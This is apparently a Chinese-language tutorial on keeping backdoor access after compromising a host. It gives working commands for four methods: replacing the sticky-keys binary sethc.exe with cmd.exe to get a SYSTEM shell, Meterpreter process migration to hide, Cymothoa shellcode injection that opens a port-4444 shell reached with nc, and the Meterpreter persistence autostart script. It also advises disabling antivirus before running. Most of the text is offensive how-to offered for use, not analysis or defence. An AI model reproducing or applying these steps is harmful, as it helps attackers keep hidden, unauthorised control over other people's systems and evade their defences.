攻击者在提升权限后,往往会通过建立后门来维持对目标主机的控制权。这样一来,即使修复了被攻击者利用的系统漏洞,攻击者还是可以通过后门继续控制目标系统
一、粘贴键后门
windows 系统下连续按 5 次 shift 可调出其程序,粘滞键是为了那些按钮有困难的人设计的,就是按键困难,那么如果用 ctrl+c,ctrl+v 这种快捷键或者其他需要组合的键时,就会有困难,不具备一次按两个或多个键的能力,那么此时就可以单按 5 下 shift 键来启动粘滞键功能。
所以我们可以通过更改注册表的命令来进行后门维持
在命令行执行:
cd C:\Windows\System32 //进入system
Move sethc.exe sethc.exe.bak //删除sethc.exe对应的功能
Copy cmd.exe sethc.exe //将cmd.exe代替sethc.exe
当我们按下5次shift时就会弹出system权限
二.进程迁移
正常使用exe上线的情况下,会在任务管理器或者直接使用tasklist命令就都可以看到exe的进程,十分容易被发现,因此要把进程迁移到其他原有的进程上面,相当于寄生在别的进程上面,不容易被发现
在metepreter输入 ps查看当前进程
输入gitpid查看查看进程号
当前这个exe运行pid号为28612
输入 migrate 进程号 命令可以将进程移动到指定进程里
如果不知道迁移到哪
输入run post/windows/manage/migrate 系统会寻找指定的进程然后迁移
进程已被迁移至 2592
三、Cymothoa后门
Cymothoa是一款隐秘的后门工具。
发现网上对于Cymothoa的文章并不是很多,可是Cymothoa又是一款非常强大的后门工具,这里记录下Cymothoa的使用笔记。
Cymothoa 是一款可以将 shellcode 注入到现有进程的(即插进程)后门工具。借助这种注入手段,它能够把shellcode伪装成常规程序。它所注入的后门程序应当能够与被注入的程序(进程)共存,以避免被管理和维护人员怀疑。将shellcode注入到其他进程,还有另外一项优势:即使目标系统的安全防护工具能够监视可执行程序的完整性,只要它不检测内存,那么它就不能发现(插进程)后门程序的进程。
下载地址:https://github.com/akpotter/cymothoa
下载得到cymothoa.c的文件编译一下就行
1.先查看Linux下正在运行的程序
ps -aux
2.在Windows下查看正在运行的进程
3.成功渗透主机后,就可以把cymothoa的可执行文件复制到目标主机,生成后门程序,
cymothoa -S 查看shellcode类型
cymothoa -p [指定注入的pid类型] -s [shellcode类型] -y [反弹的shell端口]
比如将pid=5174作为宿主进程,选用第一类shellcode,指定payload服务为4444端口
cymothoa -p 5174 -s 1 -y 4444
注入成功
4.只需要在攻击主机上输入 Nc -nvv [目标IP] 4444 即可
四、persistence后门
persistence是一款使用安装自启动方式的持久性后门程序,读者可以利用它创建注册和文件。首先run persistence -h 查看用到的所有命令
接下使用以下命令创建一个持久性后门
A:自动启动payload程序
S:系统启动时自动启动
U:用户启动是自动登录
X:开机时自动启动
i:回连的时间间隔
P:监听反向连接端口
r:目标机器IP地址
成功建立起了会话
注意:这个脚本需要在目标机器创建文件,可能会触发杀软,建议运行前关闭杀毒软件